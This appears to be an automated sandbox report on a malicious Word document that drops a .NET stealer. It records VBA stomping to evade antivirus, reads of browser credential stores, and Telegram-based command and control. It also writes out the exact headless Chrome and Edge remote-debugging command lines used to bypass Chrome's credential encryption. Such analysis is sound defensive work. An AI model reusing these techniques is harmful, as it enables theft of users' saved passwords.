    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Documents\example.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\user\Documents\example.exeMemory allocated: 1963DA40000 memory reserve | memory write watchJump to behavior
    Source: C:\Users\user\Documents\example.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: q9JZUaS1Gy.docStream path 'Macros/VBA/Module3' : , ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVa
    Source: ~WRD0000.tmp.0.drStream path 'Macros/VBA/Module3' : , ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVa
    Source: C:\Users\user\Documents\example.exeWindow / User API: threadDelayed 446Jump to behavior
    Source: C:\Users\user\Documents\example.exeWindow / User API: threadDelayed 501Jump to behavior
    Source: C:\Users\user\Documents\example.exeWindow / User API: threadDelayed 507Jump to behavior
    Source: C:\Users\user\Documents\example.exeWindow / User API: threadDelayed 2094Jump to behavior
    Source: C:\Users\user\Documents\example.exe TID: 7216Thread sleep count: 105 > 30Jump to behavior
    Source: C:\Users\user\Documents\example.exe TID: 7216Thread sleep count: 126 > 30Jump to behavior
    Source: C:\Users\user\Documents\example.exe TID: 8156Thread sleep count: 106 > 30Jump to behavior
    Source: C:\Users\user\Documents\example.exe TID: 7216Thread sleep count: 109 > 30Jump to behavior
    Source: C:\Users\user\Documents\example.exe TID: 7204Thread sleep count: 446 > 30Jump to behavior
    Source: C:\Users\user\Documents\example.exe TID: 7216Thread sleep count: 501 > 30Jump to behavior
    Source: C:\Users\user\Documents\example.exe TID: 7204Thread sleep count: 507 > 30Jump to behavior
    Source: C:\Users\user\Documents\example.exe TID: 7200Thread sleep count: 2094 > 30Jump to behavior
    Source: C:\Users\user\Documents\example.exe TID: 8152Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Users\user\Documents\example.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: chrome.exe, 0000000E.00000002.3424276222.000001819B0C9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
    Source: example.exe, 0000000C.00000003.3521351489.000001D6D812E000.00000004.00000020.00020000.00000000.sdmp, example.exe, 0000000C.00000003.3411171721.000001D6D817C000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3515258330.0000019C72E2C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information queried: ProcessInformationJump to behavior
    Source: C:\Users\user\Documents\example.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Users\user\Documents\example.exeMemory allocated: page read and write | page guardJump to behavior

    HIPS / PFW / Operating System Protection Evasion

    barindex
    Document contains VBA stomped code (only p-code) potentially bypassing AV detection
    Source: q9JZUaS1Gy.docOLE indicator, VBA stomping: true
    Source: ~WRD0000.tmp.0.drOLE indicator, VBA stomping: true
    Source: C:\Users\user\Documents\example.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9671 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --headless --disable-dev-shm-usage --no-sandboxJump to behavior
    Source: C:\Users\user\Documents\example.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9440 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --headless --disable-dev-shm-usage --no-sandboxJump to behavior
    Source: C:\Users\user\Documents\example.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct

    Stealing of Sensitive Information

    barindex
    Tries to harvest and steal browser information (history, passwords, etc)
    Source: C:\Users\user\Documents\example.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\Documents\example.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
    Source: C:\Users\user\Documents\example.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
    Source: C:\Users\user\Documents\example.exeDirectory queried: C:\Users\Public\Documents\638724448038426375Jump to behavior
    Source: C:\Users\user\Documents\example.exeDirectory queried: C:\Users\Public\Documents\638724448038426375\BrowserJump to behavior
    Source: C:\Users\user\Documents\example.exeDirectory queried: C:\Users\Public\Documents\638724448038426375\TelegramJump to behavior
    Source: C:\Users\user\Documents\example.exeDirectory queried: C:\Users\Public\Documents\638724448038426375\BrowserJump to behavior
    Source: C:\Users\user\Documents\example.exeDirectory queried: C:\Users\Public\Documents\638724448038426375\Browser\ChromeJump to behavior
    Source: C:\Users\user\Documents\example.exeDirectory queried: C:\Users\Public\Documents\638724448038426375\Browser\EdgeJump to behavior
    Source: C:\Users\user\Documents\example.exeDirectory queried: C:\Users\Public\Documents\638724448038426375\TelegramJump to behavior
    Source: C:\Users\user\Documents\example.exeDirectory queried: C:\Users\Public\Documents\638724448038426375\Browser\ChromeJump to behavior
    Source: C:\Users\user\Documents\example.exeDirectory queried: C:\Users\Public\Documents\638724448038426375\Browser\FirefoxJump to behavior
    Source: C:\Users\user\Documents\example.exeDirectory queried: C:\Users\Public\Documents\638724448038426375\Browser\Firefox\dtbqpus9.defaultJump to behavior
    Source: C:\Users\user\Documents\example.exeDirectory queried: C:\Users\Public\Documents\638724448038426375\Browser\Firefox\dtbqpus9.defaultJump to behavior
    Source: Yara matchFile source: Process Memory Space: example.exe PID: 8044, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Attempt to bypass Chrome Application-Bound Encryption
    Source: C:\Users\user\Documents\example.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9671 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --headless --disable-dev-shm-usage --no-sandbox

    Mitre Att&ck Matrix

    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    1
    Software    		42
    Scripting    		Valid Accounts1
    Windows Management Instrumentation    		42
    Scripting    		1
    DLL Side-Loading    		1
    Disable or Modify Tools    		1
    OS Credential Dumping    		11
    File and Directory Discovery    		Remote Services11
    Data from Local System    		1
    Web Service    		Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts3
    Exploitation for Client Execution    		1
    Obfuscated Files or Information    		11
    Process Injection    		1
    Deobfuscate/Decode Files or Information    		LSASS Memory2
    System Information Discovery    		Remote Desktop ProtocolData from Removable Media1
    Ingress Tool Transfer    		Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAt1
    DLL Side-Loading    		11
    Registry Run Keys / Startup Folder    		1
    Obfuscated Files or Information    		Security Account Manager11
    Security Software Discovery    		SMB/Windows Admin SharesData from Network Shared Drive1
    Encrypted Channel    		Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCron11
    Registry Run Keys / Startup Folder    		Login Hook1
    DLL Side-Loading    		NTDS1
    Process Discovery    		Distributed Component Object ModelInput Capture1
    Remote Access Software    		Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    Masquerading    		LSA Secrets31
    Virtualization/Sandbox Evasion    		SSHKeylogging3
    Non-Application Layer Protocol    		Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts31
    Virtualization/Sandbox Evasion    		Cached Domain Credentials1
    Application Window Discovery    		VNCGUI Input Capture14
    Application Layer Protocol    		Data Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
    Process Injection    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
    Rundll32    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1590807 Sample: q9JZUaS1Gy.doc Startdate: 14/01/2025 Architecture: WINDOWS Score: 100 42 api.telegram.org 2->42 44 ip-api.com 2->44 46 2 other IPs or domains 2->46 56 Suricata IDS alerts for network traffic 2->56 58 Sigma detected: Office product drops executable at suspicious location 2->58 60 Multi AV Scanner detection for submitted file 2->60 64 13 other signatures 2->64 9 WINWORD.EXE 166 122 2->9         started        14 rundll32.exe 2->14         started        signatures3 62 Uses the Telegram API (likely for C&C communication) 42->62 process4 dnsIp5 48 gitlab.com 172.65.251.78, 443, 49713 CLOUDFLARENETUS United States 9->48 28 C:\Users\user\Documents\example.exe, PE32+ 9->28 dropped 30 C:\Users\...\~WRD0000.tmp:Zone.Identifier, ASCII 9->30 dropped 32 C:\Users\user\Desktop\~WRD0000.tmp, Composite 9->32 dropped 34 C:\Users\user\Desktop\q9JZUaS1Gy.doc (copy), Composite 9->34 dropped 66 Document exploit detected (creates forbidden files) 9->66 68 Office process queries suspicious COM object (likely to drop second stage) 9->68 16 example.exe 1 53 9->16         started        file6 signatures7 process8 dnsIp9 36 ip-api.com 208.95.112.1 TUT-ASUS United States 16->36 38 api.telegram.org 149.154.167.220 TELEGRAMRU United Kingdom 16->38 40 2 other IPs or domains 16->40 50 Attempt to bypass Chrome Application-Bound Encryption 16->50 52 Creates an autostart registry key pointing to binary in C:\Windows 16->52 54 Tries to harvest and steal browser information (history, passwords, etc) 16->54 20 msedge.exe 5 16->20         started        22 chrome.exe 16->22         started        signatures10 process11 process12 24 msedge.exe 20->24         started        26 chrome.exe 22->26         started       

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    q9JZUaS1Gy.doc53%VirustotalBrowse
    q9JZUaS1Gy.doc39%ReversingLabsScript-Macro.Trojan.Amphitryon
    q9JZUaS1Gy.doc100%Joe Sandbox ML

    Dropped Files

    SourceDetectionScannerLabelLink
    C:\Users\user\Desktop\~WRD0000.tmp100%Joe Sandbox ML
    C:\Users\user\Documents\example.exe0%ReversingLabs

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://anglebug.com/362530%Avira URL Cloudsafe
    http://anglebug.com/7036a0%Avira URL Cloudsafe
    https://api.ipify.org:L0%Avira URL Cloudsafe
    http://anglebug.com/5906:0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    gitlab.com
    		172.65.251.78
    		truefalse
      		high
      api.ipify.org
      		104.26.13.205
      		truefalse
        		high
        ip-api.com
        		208.95.112.1
        		truefalse
          		high
          api.telegram.org
          		149.154.167.220
          		truefalse
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://anglebug.com/6651chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://anglebug.com/6574chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#example.exe, 0000000C.00000002.3645394042.000001963F290000.00000004.10000000.00040000.00000000.sdmpfalse
                  		high
                  https://anglebug.com/4830chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    https://api.telegram.org/botexample.exe, 0000000C.00000002.3645791369.0000019641400000.00000004.00001000.00020000.00000000.sdmp, example.exe, 0000000C.00000002.3645897805.0000019641D58000.00000004.00001000.00020000.00000000.sdmpfalse
                      		high
                      https://aka.ms/dotnet/infoexample.exe, 0000000C.00000000.3282635316.00007FF6090DD000.00000002.00000001.01000000.00000004.sdmp, example.exe.0.drfalse
                        		high
                        http://anglebug.com/2970chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://anglebug.com/4633chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://anglebug.com/7382chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://api.telegram.org:443/(2example.exe, 0000000C.00000002.3645897805.0000019641D58000.00000004.00001000.00020000.00000000.sdmpfalse
                                		high
                                https://issuetracker.google.com/284462263msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.chambersign.org1msedge.exe, 00000010.00000002.3517574489.00003A8400058000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://aka.ms/dotnet/app-launch-failedexample.exe, 0000000C.00000000.3282635316.00007FF6090DD000.00000002.00000001.01000000.00000004.sdmp, example.exe.0.drfalse
                                      		high
                                      http://anglebug.com/8162chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://anglebug.com/8280chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://issuetracker.google.com/220069903msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://anglebug.com/7308chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://anglebug.com/2162chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://anglebug.com/7714chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://anglebug.com/5430chrome.exe, 0000000E.00000002.3426711483.000033A800434000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://anglebug.com/4901chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://anglebug.com/3498chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://aka.ms/nativeaot-compatibilityexample.exe, 0000000C.00000002.3648900484.000001D6D5381000.00000020.00001000.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://anglebug.com/6248chrome.exe, 0000000E.00000002.3426477434.000033A8003DC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3424948512.000033A80000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000000E.00000002.3426410003.000033A8003C1000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519634036.00003A84002DC000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000003.3455872624.00003A84002C8000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000010.00000002.3519286006.00003A8400288000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
